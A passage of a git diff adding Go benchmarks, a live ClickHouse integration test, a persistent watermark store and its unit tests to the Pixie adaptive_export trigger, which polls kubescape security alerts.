+	const k8sDetails = `{"podNamespace":"log4j-poc","podName":"backend-vulnerable-779cd9d765-mxr8t","containerName":"backend","workloadName":"backend-vulnerable","workloadKind":"Deployment","image":"ghcr.io/k8sstormcenter/log4j-chain-backend-vulnerable:latest","clusterName":"soc-demo-pg","nodeName":"node-1"}`
+	const procDetails = `{"comm":"java","pid":1234,"ppid":1,"path":"/usr/lib/jvm/java-11/bin/java","argv":["java","-cp","/app/log4j-vuln-1.0.jar","com.example.App"],"user":"appuser","cwd":"/app","spawn_time":"2026-06-07T18:00:00Z"}`
+	row := kubescape.Row{RuleID: "R1100", Hostname: "pixie-worker-node"}
+	row.EventTime = uint64(1_700_000_000_000_000_000 + i)
+	row.K8sDetails = k8sDetails
+	row.ProcessDetails = procDetails
+	return row
+}
+
+func BenchmarkRowFingerprint(b *testing.B) {
+	sample := benchKubescapeRow(0) // same row every iteration: steady-state per-call cost
+	b.ReportAllocs()
+	b.ResetTimer()
+	for remaining := b.N; remaining > 0; remaining-- {
+		_ = rowFingerprint(sample)
+	}
+}
+
+// BenchmarkRowFingerprint_Unique cycles through 1024 rows that differ only in
+// EventTime, so successive calls hash different input bytes (as distinct
+// boundary rows would) instead of one repeated row.
+func BenchmarkRowFingerprint_Unique(b *testing.B) {
+	pool := make([]kubescape.Row, 0, 1024)
+	for i := 0; i < cap(pool); i++ {
+		pool = append(pool, benchKubescapeRow(i))
+	}
+	b.ReportAllocs()
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		_ = rowFingerprint(pool[i%len(pool)])
+	}
+}
+
+// BenchmarkRowFingerprint_LargePoll fingerprints a 10,000-row batch per
+// benchmark iteration, so ns/op is the cost of one full poll-sized dedup
+// pass rather than of a single row. NOTE(review): 10_000 is meant to
+// mirror the trigger's PollLimit and the "once per 250ms PollInterval"
+// cadence its default — confirm both against the Config defaults.
+func BenchmarkRowFingerprint_LargePoll(b *testing.B) {
+ const batch = 10_000
+ rows := make([]kubescape.Row, batch)
+ for i := range rows {
+ rows[i] = benchKubescapeRow(i) // distinct EventTime per row
+ }
+ b.ReportAllocs()
+ b.ResetTimer() // exclude fixture construction from the measurement
+ for n := 0; n < b.N; n++ {
+ for i := range rows {
+ _ = rowFingerprint(rows[i])
+ }
+ }
+}
+
+// BenchmarkRowFingerprintSimple_LargePoll runs the same 10,000-row
+// batch through fingerprintNoFmt, a hand-rolled alternative that
+// assembles the input in a strings.Builder and writes it to sha256
+// directly. It is NOT allocation-free (builder buffer, []byte copy,
+// digest and hex string are all allocated); compare its ns/op and
+// allocs/op with BenchmarkRowFingerprint_LargePoll to judge whether
+// replacing rowFingerprint's fmt.Fprintf path is worthwhile.
+func BenchmarkRowFingerprintSimple_LargePoll(b *testing.B) {
+ const batch = 10_000
+ rows := make([]kubescape.Row, batch)
+ for i := range rows {
+ rows[i] = benchKubescapeRow(i) // distinct EventTime per row
+ }
+ b.ReportAllocs()
+ b.ResetTimer() // exclude fixture construction from the measurement
+ for n := 0; n < b.N; n++ {
+ for i := range rows {
+ _ = fingerprintNoFmt(rows[i])
+ }
+ }
+}
+
+// fingerprintNoFmt is the reduced-fmt reference: only EventTime still goes
+// through fmt.Fprintf; the four string fields are appended directly, each
+// separated by a NUL byte, and the result is sha256-hashed and hex-encoded.
+// Perf-comparison anchor only — its output is NOT asserted to equal rowFingerprint's.
+func fingerprintNoFmt(r kubescape.Row) string {
+ h := sha256.New()
+ var b strings.Builder
+ b.Grow(64 + len(r.RuleID) + len(r.Hostname) + len(r.K8sDetails) + len(r.ProcessDetails)) // 64 spare bytes cover the decimal EventTime and the separators
+ _, _ = fmt.Fprintf(&b, "%d", r.EventTime) // the one remaining fmt call
+ b.WriteByte(0)
+ b.WriteString(r.RuleID)
+ b.WriteByte(0)
+ b.WriteString(r.Hostname)
+ b.WriteByte(0)
+ b.WriteString(r.K8sDetails)
+ b.WriteByte(0)
+ b.WriteString(r.ProcessDetails)
+ h.Write([]byte(b.String())) // string -> []byte conversion copies the assembled input
+ return hex.EncodeToString(h.Sum(nil))
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/integration_test.go b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go
new file mode 100644
index 00000000000..c8a42f73575
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go
@@ -0,0 +1,149 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+//go:build integration
+// +build integration
+
+package trigger_test
+
+import (
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "os"
+ "strings"
+ "testing"
+ "time"
+
+ chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
+)
+
+// Live integration test for the trigger's poll loop. Inserts a
+// kubescape_logs row directly via HTTP, then asserts the trigger
+// surfaces it as a kubescape.Event before the deadline.
+
+func env(t *testing.T) (endpoint, user, pass string) {
+	t.Helper()
+	if endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT"); endpoint == "" {
+		t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test")
+	}
+	user, pass = os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD")
+	return endpoint, user, pass
+}
+
+func ensureSchema(t *testing.T, endpoint, user, pass string) {
+	t.Helper()
+	applier, err := chpkg.NewApplier(endpoint, user, pass)
+	if err != nil {
+		t.Fatalf("NewApplier: %v", err)
+	}
+	ctx, cancel := context.WithTimeout(context.Background(), time.Minute) // bound the schema apply
+	defer cancel()
+	if applyErr := applier.Apply(ctx); applyErr != nil {
+		t.Fatalf("Apply (precondition): %v", applyErr)
+	}
+}
+
+// insertKubescapeRow shoves one synthetic row into kubescape_logs via
+// JSONEachRow on the HTTP interface — same shape Vector emits.
+func insertKubescapeRow(t *testing.T, endpoint, user, pass, hostname, ruleID string, eventTime uint64) {
+ t.Helper()
+ body := fmt.Sprintf(
+ `{"BaseRuntimeMetadata":"{\"alertName\":\"%s\"}","CloudMetadata":"","RuleID":"%s","RuntimeK8sDetails":"{\"podName\":\"redis-test\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1234,\"comm\":\"redis-server\"}}","event":"","event_time":%d,"hostname":"%s"}`,
+ ruleID, ruleID, eventTime, hostname,
+ )
+ q := url.Values{}
+ q.Set("query", "INSERT INTO forensic_db.kubescape_logs FORMAT JSONEachRow")
+ req, err := http.NewRequest(http.MethodPost,
+ strings.TrimRight(endpoint, "/")+"/?"+q.Encode(),
+ strings.NewReader(body))
+ if err != nil {
+ t.Fatal(err)
+ }
+ req.Header.Set("Content-Type", "application/x-ndjson")
+ if user != "" {
+ req.SetBasicAuth(user, pass)
+ }
+ resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req)
+ if err != nil {
+ t.Fatalf("seed insert: %v", err)
+ }
+ defer resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ buf, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ t.Fatalf("seed insert HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(buf)))
+ }
+}
+
+// TestTriggerSubscribe_Live seeds one row into a live ClickHouse and expects
+// exactly that row back as an Event on the Subscribe channel within 15s.
+func TestTriggerSubscribe_Live(t *testing.T) {
+ endpoint, user, pass := env(t)
+ ensureSchema(t, endpoint, user, pass)
+
+ hostname := fmt.Sprintf("aw-trig-%d", time.Now().UnixNano()) // unique per run, so rows from other runs never match the hostname filter
+ now := time.Now()
+ eventTime := uint64(now.UnixNano())
+
+ // Start the watermark one nanosecond before the synthetic event_time
+ // so the seeded row is in range for the first poll that runs after
+ // the insert below.
+ cfg := trigger.Config{
+ Endpoint: endpoint,
+ Username: user,
+ Password: pass,
+ Hostname: hostname,
+ PollInterval: 200 * time.Millisecond,
+ InitialWatermark: eventTime - 1,
+ }
+ trg, err := trigger.New(cfg)
+ if err != nil {
+ t.Fatalf("trigger.New: %v", err)
+ }
+
+ ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) // doubles as the test deadline below
+ defer cancel()
+ ch, err := trg.Subscribe(ctx)
+ if err != nil {
+ t.Fatalf("Subscribe: %v", err)
+ }
+
+ insertKubescapeRow(t, endpoint, user, pass, hostname, "R1005", eventTime)
+
+ select {
+ case ev, ok := <-ch:
+ if !ok {
+ t.Fatalf("channel closed before event arrived")
+ }
+ if ev.RuleID != "R1005" {
+ t.Errorf("Event.RuleID = %q, want R1005", ev.RuleID)
+ }
+ if ev.Hostname != hostname {
+ t.Errorf("Event.Hostname = %q, want %q", ev.Hostname, hostname)
+ }
+ if ev.EventTime != eventTime {
+ t.Errorf("Event.EventTime = %d, want %d", ev.EventTime, eventTime)
+ }
+ if ev.Target.Pod != "redis-test" || ev.Target.Namespace != "redis" {
+ t.Errorf("Event.Target = %+v, want pod=redis-test, ns=redis", ev.Target)
+ }
+ case <-ctx.Done():
+ t.Fatalf("trigger did not surface the seeded row within 15s")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark.go b/src/vizier/services/adaptive_export/internal/trigger/watermark.go
new file mode 100644
index 00000000000..6d6d98daa87
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/watermark.go
@@ -0,0 +1,127 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "fmt"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp"
+)
+
+// WatermarkStore persists the trigger's per-(hostname,table) cursor
+// across operator restarts. Without persistence, every restart on a
+// busy node replays kubescape_logs from event_time=0 — multi-GiB
+// single-shot SELECTs that the trigger's HTTP client times out on,
+// pinning the watermark at 0 forever.
+//
+// Load returns (watermark, true, nil) when a row exists, or
+// (0, false, nil) when no row exists yet (fresh cluster). An error
+// returned from Load or Save is logged + non-fatal: the trigger falls
+// back to whatever cold-start strategy the caller chose.
+type WatermarkStore interface {
+ Load(ctx context.Context, hostname, table string) (uint64, bool, error) // (watermark, found, err)
+ Save(ctx context.Context, hostname, table string, watermark uint64) error // records watermark for the (hostname, table) key
+}
+
+// ClickHouseWatermarkStore is the production WatermarkStore — reads
+// and writes forensic_db.trigger_watermark over the same HTTP endpoint
+// as the rest of the operator. Schema is owned by the clickhouse
+// package's Apply (CREATE TABLE IF NOT EXISTS at boot).
+type ClickHouseWatermarkStore struct {
+ database string // validated identifier, interpolated into the SQL as the table's database
+ c *chhttp.Client // HTTP client used for both the Load query and the Save insert
+}
+
+// NewClickHouseWatermarkStore returns a store bound to endpoint. An empty
+// database means "forensic_db"; timeout goes to chhttp.New as-is (0 → its default).
+func NewClickHouseWatermarkStore(endpoint, database, user, pass string, timeout time.Duration) (*ClickHouseWatermarkStore, error) {
+	if database == "" {
+		database = "forensic_db"
+	}
+	if valid := validIdentifier(database); !valid {
+		return nil, fmt.Errorf("watermark: invalid database identifier %q", database)
+	}
+	client, err := chhttp.New(endpoint, user, pass, timeout)
+	if err != nil {
+		return nil, fmt.Errorf("watermark: %w", err)
+	}
+	store := &ClickHouseWatermarkStore{database: database, c: client}
+	return store, nil
+}
+
+// Load returns the most-recent persisted watermark for (hostname, table).
+// Uses FINAL — the table is ReplacingMergeTree, and per-(hostname,table)
+// cardinality is one, so the cost is negligible. (0, false, nil) means
+// no row exists for the key yet — the trigger's caller chooses cold-start.
+func (s *ClickHouseWatermarkStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) {
+ body, err := s.c.Query(ctx, fmt.Sprintf(
+ "SELECT watermark FROM %s.trigger_watermark FINAL "+
+ "WHERE hostname = %s AND table_name = %s LIMIT 1 FORMAT JSONEachRow",
+ s.database, quoteCH(hostname), quoteCH(table)))
+ if err != nil {
+ return 0, false, fmt.Errorf("watermark load: %w", err)
+ }
+ body = bytes.TrimSpace(body)
+ if len(body) == 0 {
+ return 0, false, nil
+ }
+ // Keep the value as raw JSON and parse it strictly as uint64: UInt64
+ // values above 2^53 lose precision through float64. NOTE(review):
+ // parseUint64Loose is expected to accept a number or a quoted string — confirm.
+ var raw struct {
+ Watermark json.RawMessage `json:"watermark"`
+ }
+ if err := json.Unmarshal(bytes.Split(body, []byte{'\n'})[0], &raw); err != nil { // only the first line is decoded
+ return 0, false, fmt.Errorf("watermark load: parse response: %w", err)
+ }
+ wm, err := parseUint64Loose(raw.Watermark)
+ if err != nil {
+ return 0, false, fmt.Errorf("watermark load: %w", err)
+ }
+ return wm, true, nil
+}
+
+// Save inserts a new row. ReplacingMergeTree(updated_at) merges later;
+// reads via FINAL always return the freshest. Write is fire-and-merge
+// — no UPDATE semantics, no contention with concurrent INSERTs from
+// other operator instances (each pins its own hostname). Every error is
+// returned wrapped with a "watermark save" prefix.
+func (s *ClickHouseWatermarkStore) Save(ctx context.Context, hostname, table string, watermark uint64) error {
+	row, err := json.Marshal(struct {
+		Hostname  string `json:"hostname"`
+		TableName string `json:"table_name"`
+		Watermark uint64 `json:"watermark"`
+		UpdatedAt string `json:"updated_at"`
+	}{
+		Hostname:  hostname,
+		TableName: table,
+		Watermark: watermark,
+		UpdatedAt: time.Now().UTC().Format("2006-01-02 15:04:05.000000000"),
+	})
+	if err != nil {
+		return fmt.Errorf("watermark save: encode row: %w", err)
+	}
+	query := fmt.Sprintf("INSERT INTO %s.trigger_watermark FORMAT JSONEachRow", s.database)
+	if _, err := s.c.Insert(ctx, query, row, chhttp.InsertOptions{}); err != nil {
+		return fmt.Errorf("watermark save: %w", err)
+	}
+	return nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go
new file mode 100644
index 00000000000..d0cf8aa818a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go
@@ -0,0 +1,313 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+)
+
+// fakeStore is a mutex-guarded, in-memory WatermarkStore: Load replays the
+// preset load* fields and Save records each watermark unless saveErr is set.
+type fakeStore struct {
+	mu         sync.Mutex
+	saves      []uint64
+	loadResult uint64
+	loadOK     bool
+	loadErr    error
+	saveErr    error
+}
+
+func (f *fakeStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) {
+	f.mu.Lock()
+	wm, found, err := f.loadResult, f.loadOK, f.loadErr
+	f.mu.Unlock()
+	return wm, found, err
+}
+
+func (f *fakeStore) Save(ctx context.Context, hostname, table string, wm uint64) error {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	if f.saveErr == nil {
+		f.saves = append(f.saves, wm)
+	}
+	return f.saveErr
+}
+
+func (f *fakeStore) savedCount() int {
+	f.mu.Lock()
+	n := len(f.saves)
+	f.mu.Unlock()
+	return n
+}
+
+// TestTrigger_LoadsPersistentWatermarkOnBoot — the very first SELECT
+// the trigger issues must use the watermark returned by the store's
+// Load as its lower bound, not the configured InitialWatermark.
+func TestTrigger_LoadsPersistentWatermarkOnBoot(t *testing.T) {
+ queries := make(chan string, 256)
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ queries <- r.URL.Query().Get("query")
+ _, _ = w.Write([]byte("")) // no rows: only the query text matters here
+ }))
+ defer srv.Close()
+
+ store := &fakeStore{loadResult: 1744000000000000000, loadOK: true}
+ tr, err := New(Config{
+ Endpoint: srv.URL,
+ Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ Watermark: store,
+ // InitialWatermark deliberately set to a SMALLER value than
+ // the store's — the store's value must win.
+ InitialWatermark: 0,
+ })
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ _, _ = tr.Subscribe(ctx)
+ select {
+ case q := <-queries:
+ // post-#10/trigger-unit-normalize: SQL emits multiIf(...) >=
+ // (event_time is auto-normalized to nanoseconds). 1.744e18 is already
+ // ns-scale, so the stored value appears in the query unchanged.
+ if !strings.Contains(q, ") >= 1744000000000000000") {
+ t.Fatalf("first query did not use persisted watermark; got %q", q)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first poll")
+ }
+}
+
+// TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty — fresh cluster:
+// the store reports no row for this host, so the first query must be
+// bounded by the configured InitialWatermark instead.
+func TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty(t *testing.T) {
+	seen := make(chan string, 256)
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		seen <- r.URL.Query().Get("query")
+		_, _ = w.Write([]byte(""))
+	}))
+	defer srv.Close()
+
+	cfg := Config{
+		Endpoint: srv.URL, Hostname: "node-1",
+		PollInterval:     30 * time.Millisecond,
+		Watermark:        &fakeStore{loadOK: false}, // no row present
+		InitialWatermark: 42,
+	}
+	tr, _ := New(cfg)
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	_, _ = tr.Subscribe(ctx)
+	// post-#10/trigger-unit-normalize: 42 is <1e10, so it is treated as
+	// seconds and scaled by 1e9 → 42_000_000_000 in the emitted bound.
+	select {
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("timeout waiting for first poll")
+	case q := <-seen:
+		if !strings.Contains(q, ") >= 42000000000") {
+			t.Fatalf("first query did not use InitialWatermark fallback; got %q", q)
+		}
+	}
+}
+
+// TestTrigger_FallsBackOnStoreLoadError — a store whose Load fails at
+// boot must not keep the trigger from polling; the first query is
+// bounded by InitialWatermark instead.
+func TestTrigger_FallsBackOnStoreLoadError(t *testing.T) {
+	seen := make(chan string, 256)
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		seen <- r.URL.Query().Get("query")
+		_, _ = w.Write([]byte(""))
+	}))
+	defer srv.Close()
+
+	cfg := Config{
+		Endpoint: srv.URL, Hostname: "node-1",
+		PollInterval:     30 * time.Millisecond,
+		Watermark:        &fakeStore{loadErr: fmt.Errorf("clickhouse unreachable")},
+		InitialWatermark: 7,
+	}
+	tr, _ := New(cfg)
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	_, _ = tr.Subscribe(ctx)
+	// post-#10/trigger-unit-normalize: 7 is <1e10, so it is treated as
+	// seconds and scaled by 1e9 → 7_000_000_000 in the emitted bound.
+	select {
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("timeout waiting for first poll")
+	case q := <-seen:
+		if !strings.Contains(q, ") >= 7000000000") {
+			t.Fatalf("error path did not fall back to InitialWatermark; got %q", q)
+		}
+	}
+}
+
+// TestTrigger_ThrottledWatermarkSave — successful advances are
+// flushed at WatermarkSaveInterval cadence, not on every poll. The
+// fake store must see at least one save but fewer saves than polls.
+func TestTrigger_ThrottledWatermarkSave(t *testing.T) {
+ const row1 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000001","hostname":"node-1"}`
+ const row2 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000002","hostname":"node-1"}`
+ var calls int64
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ n := atomic.AddInt64(&calls, 1)
+ if n%2 == 1 { // odd polls return row1, even polls row2, so every poll has a row
+ _, _ = w.Write([]byte(row1 + "\n"))
+ } else {
+ _, _ = w.Write([]byte(row2 + "\n"))
+ }
+ }))
+ defer srv.Close()
+
+ store := &fakeStore{loadOK: false}
+ tr, _ := New(Config{
+ Endpoint: srv.URL, Hostname: "node-1",
+ PollInterval: 10 * time.Millisecond,
+ Watermark: store,
+ WatermarkSaveInterval: 100 * time.Millisecond,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+ go func() { // drain events so the test never holds an unread event channel
+ for range ch {
+ }
+ }()
+
+ time.Sleep(250 * time.Millisecond) // up to ~25 polls at 10ms; ~2 save intervals at 100ms
+ saves := store.savedCount()
+ pollCalls := int(atomic.LoadInt64(&calls))
+ if pollCalls < 10 {
+ t.Fatalf("expected many polls in 250ms; got %d", pollCalls)
+ }
+ if saves >= pollCalls {
+ t.Fatalf("saves not throttled: %d saves vs %d polls", saves, pollCalls)
+ }
+ if saves == 0 {
+ t.Fatalf("no watermark saves at all in 250ms with active rows")
+ }
+}
+
+// TestTrigger_LimitsRowsPerPoll — every query carries LIMIT N so
+// catch-up after a stale watermark doesn't translate into one giant
+// scan that times out.
+func TestTrigger_LimitsRowsPerPoll(t *testing.T) {
+ queries := make(chan string, 256)
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ queries <- r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(""))
+ }))
+ defer srv.Close()
+
+ tr, _ := New(Config{
+ Endpoint: srv.URL, Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ PollLimit: 250,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ _, _ = tr.Subscribe(ctx)
+ select {
+ case q := <-queries:
+ if !strings.Contains(q, "LIMIT 250") {
+ t.Fatalf("query missing LIMIT clause: %q", q)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first poll")
+ }
+}
+
+// TestTrigger_PartialBodyReadStillAdvances — server emits one well-formed
+// line then closes the connection mid-second-line. The trigger must still
+// emit the first event AND advance its watermark so the next poll picks up
+// from there, instead of looping forever on the same start watermark.
+func TestTrigger_PartialBodyReadStillAdvances(t *testing.T) {
+	const goodLine = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"5000","hostname":"node-1"}`
+	queries := make(chan string, 256)
+	var calls int64
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		queries <- r.URL.Query().Get("query")
+		if atomic.AddInt64(&calls, 1) == 1 {
+			// Take over the raw conn so we can write a valid HTTP response then
+			// close the connection mid-stream — emulating the production failure
+			// mode where CH starts streaming, the HTTP timeout fires, and the body
+			// read returns mid-line. Failures here use t.Errorf + return because
+			// t.Fatalf must only be called from the goroutine running the test.
+			hj, ok := w.(http.Hijacker)
+			if !ok {
+				t.Errorf("ResponseWriter does not support Hijack")
+				return
+			}
+			conn, bufrw, err := hj.Hijack()
+			if err != nil {
+				t.Errorf("Hijack: %v", err)
+				return
+			}
+			_, _ = io.WriteString(bufrw, "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain; charset=utf-8\r\n\r\n")
+			_, _ = io.WriteString(bufrw, goodLine+"\n")
+			_, _ = io.WriteString(bufrw, "{\"RuleID\":\"R2\",\"Runtime")
+			_ = bufrw.Flush()
+			_ = conn.Close()
+			return
+		}
+		_, _ = w.Write([]byte(""))
+	}))
+	defer srv.Close()
+
+	tr, _ := New(Config{
+		Endpoint: srv.URL, Hostname: "node-1",
+		PollInterval: 30 * time.Millisecond,
+	})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	ch, _ := tr.Subscribe(ctx)
+
+	select {
+	case ev := <-ch:
+		if ev.Target.PID != 1 {
+			t.Fatalf("first event PID = %d, want 1", ev.Target.PID)
+		}
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("timeout waiting for first event from partial body")
+	}
+
+	// Discard the first poll's query (already buffered); check the second one.
+	<-queries
+	select {
+	case q := <-queries:
+		// post-#10/trigger-unit-normalize: the good line emits event_time="5000"
+		// (seconds); the advanced watermark goes through the multiIf with the
+		// sec→ns multiplier (× 1e9) → 5_000_000_000_000.
+		if !strings.Contains(q, ") >= 5000000000000") {
+			t.Fatalf("watermark did not advance on partial read; second query: %q", q)
+		}
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("timeout waiting for second poll")
+	}
+}